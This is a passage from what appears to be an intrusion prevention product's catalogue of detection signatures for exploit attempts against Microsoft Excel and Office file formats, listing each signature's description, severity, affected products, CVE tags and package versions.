About this situation: An attempt to exploit Excel vulnerability CVE-2011-0101
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2011-04, CVE2011, Windows not specific, Microsoft Excel not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Excel-Record-Parsing-WriteAV-Vulnerability-CVE-2011-0101
Description:
Back to top

File-OLE_Microsoft-Excel-Rept-Function-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2008-10, CVE2008, Windows not specific, Microsoft Excel not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-467-5211
Last changed: sgpkg-ips-467-5211
Vulnerability: Microsoft-Excel-Rept-Function-Integer-Overflow
Description:
Back to top

File-OLE_Microsoft-Excel-Rich-Text-Handling-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, Microsoft Office, Microsoft Office Compatibility Pack, MS2008-03, CVE2008, Windows not specific, Microsoft Excel not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-739-5211
Vulnerability: Microsoft-Excel-Rich-Text-Handling-Code-Execution
Description:
Back to top

File-OLE_Microsoft-Excel-rtWindow1-Record-Handling-Code-Execution

About this situation: An attempt to exploit memory corruption vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, MS2007-07, CVE2007, Any Operating System not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Excel-rtWindow1-Record-Handling-Code-Execution
Description:
Back to top

File-OLE_Microsoft-Excel-SerAuxErrBar-Heap-Overflow

About this situation: Detected attempt to exploit a vulnerability in Microsoft Excel
Context: OLE File Stream
Severity: 7
Tags: Windows, Mac OS X, Any Hardware, Microsoft Excel 2003, Microsoft Excel 2007, Microsoft Excel 2008 for Mac, Microsoft Office Compatibility Pack, Microsoft Excel 2010, MS2012-11, CVE2012, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-491-5211
Last changed: sgpkg-ips-1689-5242
Vulnerability: Microsoft-Excel-SerAuxErrBar-Heap-Overflow
Description:
Back to top

File-OLE_Microsoft-Excel-Set-Font-Handling-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, MS2007-05, CVE2007, Windows not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-414-4219
Vulnerability: Microsoft-Excel-Set-Font-Handling-Code-Execution
Description:
Back to top

File-OLE_Microsoft-Excel-Sst-Invalid-Length-Use-After-Free

About this situation: Detected attempt to exploit a vulnerability in Microsoft Excel
Context: OLE File Stream
Severity: 7
Tags: Windows, Mac OS X, Any Hardware, Microsoft Excel 2007, Microsoft Excel 2008 for Mac, Microsoft Office Compatibility Pack, Microsoft Excel 2011 for Mac, Microsoft Excel 2010, MS2012-11, CVE2012, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-491-5211
Last changed: sgpkg-ips-1689-5242
Vulnerability: Microsoft-Excel-Sst-Invalid-Length-Use-After-Free
Description:
Back to top

File-OLE_Microsoft-Excel-Style-Record-Data-Handling-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, Microsoft Office, MS2008-03, CVE2008, Windows not specific, Microsoft Excel not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1348-5242
Vulnerability: Microsoft-Excel-Style-Record-Data-Handling-Code-Execution
Description:
Back to top

File-OLE_Microsoft-Excel-SxView-Record-Parsing-Memory-Corruption-CVE-2010-0821

About this situation: A malicious Microsoft Excel document targeting CVE-2010-0821 over HTTP detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Office, MS2010-06, CVE2010, Any Operating System not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Excel-SxView-Record-Parsing-Memory-Corruption-CVE-2010-0821
Description:
Back to top

File-OLE_Microsoft-Excel-Txo-And-Obj-Records-Parsing-Stack-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, Microsoft Office, MS2008-12, CVE2008, Windows not specific, Microsoft Excel not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-467-5211
Last changed: sgpkg-ips-467-5211
Vulnerability: Microsoft-Excel-Txo-And-Obj-Records-Parsing-Stack-Memory-Corruption
Description:
Back to top

File-OLE_Microsoft-Excel-Type-Mismatch-Series-Record-Parsing-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2012-05, CVE2012, Windows not specific, Microsoft Excel not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-454-4333
Last changed: sgpkg-ips-454-4333
Vulnerability: Microsoft-Excel-Type-Mismatch-Series-Record-Parsing-Memory-Corruption
Description:
Back to top

File-OLE_Microsoft-Excel-Version-Information-Handling-Code-Execution

About this situation: Attempt to exploit memory corruption vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, MS2007-07, CVE2007, Any Operating System not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1652-5242
Vulnerability: Microsoft-Excel-Version-Information-Handling-Code-Execution
Description:
Back to top

File-OLE_Microsoft-Excel-Window2-Record-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Excel, Any Operating System not specific, Microsoft Excel not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-425-4219
Last changed: sgpkg-ips-425-4219
Vulnerability: Microsoft-Excel-Window2-Record-Use-After-Free
Description:
Back to top

File-OLE_Microsoft-Excel-Workbook

About this situation: Microsoft Excel workbook file download detected
Context: OLE File Stream
Severity: 2
Tags: Windows, Mac OS X, Any Hardware, Microsoft Excel, Windows not specific, Microsoft Excel not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-OLE_Microsoft-Excel-Workbook-Workspace-Designation-Handling-Code-Execution

About this situation: Attempt to exploit memory corruption vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, MS2007-07, CVE2007, Any Operating System not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Excel-Workbook-Workspace-Designation-Handling-Code-Execution
Description:
Back to top

File-OLE_Microsoft-Excel-WriteAV-Vulnerability-CVE-2011-1278

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2011-06, CVE2011, Windows not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Excel-WriteAV-Vulnerability-CVE-2011-1278
Description:
Back to top

File-OLE_Microsoft-Graphics-Rendering-Engine-Thumbnail-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: OLE File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 2008, Any Hardware, MS2011-02, CVE2010, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Graphics-Rendering-Engine-Thumbnail-Stack-Buffer-Overflow
Description:
Back to top

File-OLE_Microsoft-Hyperlink-Object-Library-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2016-02, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-733-5211
Last changed: sgpkg-ips-733-5211
Vulnerability: Microsoft-Hyperlink-Object-Library-Information-Disclosure
Description:
Back to top

File-OLE_Microsoft-Installer-Database

About this situation: Microsoft Installer Database file download detected
Context: OLE File Stream
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-OLE_Microsoft-Installer-Patch

About this situation: Microsoft Installer Patch file download detected
Context: OLE File Stream
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-OLE_Microsoft-Installer-Transform

About this situation: Microsoft Installer Transform file download detected
Context: OLE File Stream
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-OLE_Microsoft-Jet-Database-Engine-Excel-Component-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2017, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1012-5242
Last changed: sgpkg-ips-1661-5242
Vulnerability: Microsoft-Jet-Database-Engine-Excel-Component-Buffer-Overflow
Description:
Back to top

File-OLE_Microsoft-Jet-Database-Engine-Excel-Component-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1017-5242
Last changed: sgpkg-ips-1017-5242
Vulnerability: Microsoft-Jet-Database-Engine-Excel-Component-Heap-Buffer-Overflow
Description:
Back to top

File-OLE_Microsoft-Jet-Database-Engine-Heap-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1141-5242
Last changed: sgpkg-ips-1141-5242
Vulnerability: Microsoft-Jet-Database-Engine-Heap-Based-Buffer-Overflow
Description:
Back to top

File-OLE_Microsoft-Office-Art-Drawing-Records-CVE-2010-3334

About this situation: Detected attempt to exploit a vulnerability in Microsoft Office
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office XP, Microsoft Office 2003, Microsoft Office 2004, Microsoft Office 2007, Microsoft Office 2008, MS2010-11, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Office-Art-Drawing-Records-CVE-2010-3334
Description:
Back to top

File-OLE_Microsoft-Office-Art-Property-Table-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2009-10, CVE2009, Windows not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1651-5242
Vulnerability: Microsoft-Office-Art-Property-Table-Memory-Corruption
Description:
Back to top

File-OLE_Microsoft-Office-Bad-Index-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2014-12, CVE2014, Windows not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-629-5211
Vulnerability: Microsoft-Office-Bad-Index-Memory-Corruption
Description:
Back to top

File-OLE_Microsoft-Office-Buffer-Overflow-CVE-2013-1331

About this situation: Detected attempt to exploit a vulnerability in Microsoft Office
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office 2003, Microsoft Office 2011, MS2013-06, CVE2013, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-526-5211
Last changed: sgpkg-ips-1400-5242
Vulnerability: Microsoft-Office-Buffer-Overflow-CVE-2013-1331
Description:
Back to top

File-OLE_Microsoft-Office-Ctasksymbol-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2015-09, CVE2015, Windows not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-704-5211
Vulnerability: Microsoft-Office-Ctasksymbol-Use-After-Free
Description:
Back to top

File-OLE_Microsoft-Office-CVE-2016-7264-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2016-12, CVE2016, Windows not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-839-5242
Last changed: sgpkg-ips-839-5242
Vulnerability: Microsoft-Office-CVE-2016-7264-Out-Of-Bounds-Read
Description:
Back to top

File-OLE_Microsoft-Office-CVE-2016-7289-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Publisher detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, Microsoft Publisher, MS2016-12, CVE2016, Windows not specific, Microsoft Office not specific, Microsoft Publisher not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-844-5242
Last changed: sgpkg-ips-844-5242
Vulnerability: Microsoft-Office-CVE-2016-7289-Memory-Corruption
Description:
Back to top

File-OLE_Microsoft-Office-Drawing-Exception-Handling-CVE-2010-3335

About this situation: Detected attempt to exploit a vulnerability in Microsoft Office
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office XP, Microsoft Office 2003, Microsoft Office 2004, Microsoft Office 2007, Microsoft Office 2008, Microsoft Office 2010, MS2010-11, CVE2010, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Office-Drawing-Exception-Handling-CVE-2010-3335
Description:
Back to top

File-OLE_Microsoft-Office-Drawing-Record-Msofbtopt-Code-Execution

About this situation: Attempt to exploit code execution vulnerability in Microsoft Office detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Project, Microsoft Visio, Microsoft Office, MS2007-02, CVE2007, Any Operating System not specific, Microsoft Visio not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Office-Drawing-Record-Msofbtopt-Code-Execution
Description:
Back to top

File-OLE_Microsoft-Office-Drawing-Shapes-Handling-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, MS2008-03, CVE2008, Windows not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-647-5211
Vulnerability: Microsoft-Office-Drawing-Shapes-Handling-Memory-Corruption
Description:
Back to top

File-OLE_Microsoft-Office-Excel-ADO-Object-Parsing-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, Microsoft Office, MS2010-06, CVE2010, Windows not specific, Microsoft Excel not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Office-Excel-ADO-Object-Parsing-Code-Execution
Description:
Back to top

File-OLE_Microsoft-Office-Excel-Binary-Format-Parsing-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Office Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, Microsoft Office, Microsoft Open XML File Format Converter, MS2009-06, CVE2009, Windows not specific, Microsoft Excel not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Office-Excel-Binary-Format-Parsing-Integer-Overflow
Description:
Back to top

File-OLE_Microsoft-Office-Excel-CVE-2019-1110-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, Microsoft Office, CVE2019, Windows not specific, Microsoft Excel not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1176-5242
Last changed: sgpkg-ips-1346-5242
Vulnerability: Microsoft-Office-Excel-CVE-2019-1110-Information-Disclosure
Description:
Back to top

File-OLE_Microsoft-Office-Excel-File-Obj-Record-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, Microsoft Office, Microsoft Office Compatibility Pack, MS2008-12, CVE2008, Windows not specific, Microsoft Excel not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-416-4219
Last changed: sgpkg-ips-1663-5242
Vulnerability: Microsoft-Office-Excel-File-Obj-Record-Memory-Corruption
Description:
Back to top

File-OLE_Microsoft-Office-Excel-Formula-Record-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Excel, Microsoft Office, MS2010-10, CVE2010, Any Operating System not specific, Microsoft Excel not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-1036-5242
Vulnerability: Microsoft-Office-Excel-Formula-Record-Code-Execution
Description:
Back to top

File-OLE_Microsoft-Office-Excel-Hfpicture-Record-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office XP, Microsoft Office 2004, Microsoft Excel 2002, MS2010-06, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Office-Excel-Hfpicture-Record-Buffer-Overflow
Description:
Back to top

File-OLE_Microsoft-Office-Excel-Malformed-LBL-Record-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Office Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, Microsoft Office, Microsoft Open XML File Format Converter, MS2009-06, CVE2009, Windows not specific, Microsoft Excel not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1623-5242
Vulnerability: Microsoft-Office-Excel-Malformed-LBL-Record-Memory-Corruption
Description:
Back to top

File-OLE_Microsoft-Office-Excel-Malformed-Object-Record-Parsing-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Excel Viewer detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2009-06, CVE2009, Windows not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1662-5242
Vulnerability: Microsoft-Office-Excel-Malformed-Object-Record-Parsing-Code-Execution
Description:
Back to top

File-OLE_Microsoft-Office-Excel-Malformed-Records-Stack-Buffer-Overflow

About this situation: An attempt to exploit a buffer overflow vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Excel, MS2009-06, CVE2009, Any Operating System not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-714-5211
Vulnerability: Microsoft-Office-Excel-Malformed-Records-Stack-Buffer-Overflow
Description:
Back to top

File-OLE_Microsoft-Office-Excel-Memory-Corruption-CVE-2010-2562

About this situation: A malicious Microsoft Excel document targeting CVE-2010-2562 over HTTP detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Office, MS2010-08, CVE2010, Any Operating System not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-420-4219
Vulnerability: Microsoft-Office-Excel-Memory-Corruption-CVE-2010-2562
Description:
Back to top

File-OLE_Microsoft-Office-Excel-Obj-Record-Stack-Buffer-Overflow-CVE-2010-0822

About this situation: A malicious Microsoft Excel document targeting CVE-2010-0822 over HTTP detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Office, MS2010-06, CVE2010, Any Operating System not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Office-Excel-Obj-Record-Stack-Buffer-Overflow-CVE-2010-0822
Description:
Back to top

File-OLE_Microsoft-Office-Excel-Object-Record-Corruption

About this situation: An attempt to exploit a memory corruption vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Excel, MS2009-06, CVE2009, Any Operating System not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Office-Excel-Object-Record-Corruption
Description:
Back to top

File-OLE_Microsoft-Office-Excel-Ptgextraarray-Structure-Parsing-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2010-10, CVE2010, Windows not specific, Microsoft Excel not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1036-5242
Last changed: sgpkg-ips-1036-5242
Vulnerability: Microsoft-Office-Excel-Ptgextraarray-Structure-Parsing-Memory-Corruption
Description:
Back to top

File-OLE_Microsoft-Office-Excel-Publisher-Record-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2010-06, CVE2010, Windows not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-467-5211
Last changed: sgpkg-ips-1652-5242
Vulnerability: Microsoft-Office-Excel-Publisher-Record-Memory-Corruption
Description:
Back to top

File-OLE_Microsoft-Office-Excel-Realtimedata-Record-Parsing-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Office Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2010-06, CVE2010, Windows not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Office-Excel-Realtimedata-Record-Parsing-Memory-Corruption
Description:
Back to top

File-OLE_Microsoft-Office-Excel-Record-Pointer-Overwrite-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Excel Viewer detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2009-06, CVE2009, Windows not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1346-5242
Vulnerability: Microsoft-Office-Excel-Record-Pointer-Overwrite-Code-Execution
Description:
Back to top

File-OLE_Microsoft-Office-Excel-Remote-Code-Execution-CVE-2009-3129

About this situation: A malicious Microsoft Excel document targeting CVE-2009-3129 over HTTP detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, MS2009-11, CVE2009, Any Operating System not specific, Microsoft Excel not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Office-Excel-Remote-Code-Execution-CVE-2009-3129
Description:
Back to top

File-OLE_Microsoft-Office-Excel-Remote-Code-Execution-CVE-2009-3134

About this situation: A malicious Microsoft Excel document targeting CVE-2009-3134 over HTTP detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, MS2009-11, CVE2009, Any Operating System not specific, Microsoft Excel not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1651-5242
Vulnerability: Microsoft-Office-Excel-Remote-Code-Execution-CVE-2009-3134
Description:
Back to top

File-OLE_Microsoft-Office-Excel-RTD-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, Microsoft Office, MS2010-06, CVE2010, Windows not specific, Microsoft Excel not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Office-Excel-RTD-Buffer-Overflow
Description:
Back to top

File-OLE_Microsoft-Office-Excel-Sheet-Object-Type-Confusion

About this situation: An attempt to exploit a vulnerability in Microsoft Office Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, MS2010-03, CVE2010, Windows not specific, Microsoft Excel not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1035-5242
Last changed: sgpkg-ips-1035-5242
Vulnerability: Microsoft-Office-Excel-Sheet-Object-Type-Confusion
Description:
Back to top

File-OLE_Microsoft-Office-Excel-String-Variable-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Excel detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel, Microsoft Office, MS2010-06, CVE2010, Windows not specific, Microsoft Excel not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Office-Excel-String-Variable-Code-Execution
Description:
Back to top

File-OLE_Microsoft-Office-Excel-Sxdb-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Office Excel detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Excel, Microsoft Excel Viewer, Microsoft Open XML File Format Converter, MS2009-11, CVE2009, Any Operating System not specific, Microsoft Excel not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Office-Excel-Sxdb-Memory-Corruption
Description:
Back to top

File-OLE_Microsoft-Office-Excel-SxView-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Excel Viewer, Microsoft Office, Microsoft Office Compatibility Pack, MS2009-11, CVE2009, Any Operating System not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Office-Excel-SxView-Memory-Corruption
Description:
Back to top

File-OLE_Microsoft-Office-Excel-SxView-SXStreamID-CVE-2010-1245

